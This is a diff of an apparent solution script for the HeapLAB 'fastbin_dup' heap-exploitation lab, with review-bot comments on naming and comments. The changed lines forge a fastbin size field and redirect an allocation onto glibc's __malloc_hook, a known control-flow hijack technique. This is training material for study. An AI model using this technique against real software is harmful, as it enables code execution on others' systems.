Diffstat (limited to 'HeapLAB/challenge-fastbin_dup/bruh.py')
-rwxr-xr-xHeapLAB/challenge-fastbin_dup/bruh.py7
1 files changed, 4 insertions, 3 deletions
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
index 191cbea..56b0c71 100755
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -55,7 +55,7 @@ free(chunk1)
#malloc(24, p64(libc.sym.main_arena + 96))
#this sets up a fake size field in the fastbins
-malloc(24, p64(0x81))
+malloc(24, p64(0x80))
malloc(24, 'asdf')
malloc(24, 'asdf')
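Review bot: The value on the changed line, `malloc(24, p64(0x80))`, is a bare literal, and the comment above it ("this sets up a fake size field in the fastbins") does not say what the value has to match or why it moved from 0x81 to 0x80, which differs only in bit 0. A trailing comment recording the reason would spare the next reader from re-deriving it, e.g. `# fake size field: low flag bit cleared (was 0x81) because <reason>`. The same applies to the new offset in `payload_loc = libc.sym.__malloc_hook - 35` in the second hunk, where the neighbouring `#8 * 9` comment accounts for the padding but not for the 35. The script is flat and continues outside both hunks.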
@@ -74,9 +74,10 @@ malloc(119, 'sdfg')
#8 * 9
-malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16))
+payload_loc = libc.sym.__malloc_hook - 35
+malloc(119, p64(0)*9 + p64(payload_loc))
-print(hex(fake_chunk_loc))
+print("top chunk addr: {}".format(hex(payload_loc)))
# =============================================================================
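Review bot: The new print labels the value "top chunk addr" while the assignment two lines above calls the same value `payload_loc`, so the log output and the code use different names for one address. Picking one term and using it in both places makes the output traceable to the source, for example `print("payload_loc: {:#x}".format(payload_loc))`, which also drops the nested `hex()` call. The removed line printed `fake_chunk_loc`; if nothing else in the script reads that name it is now unused and can go, though its definition is outside this hunk.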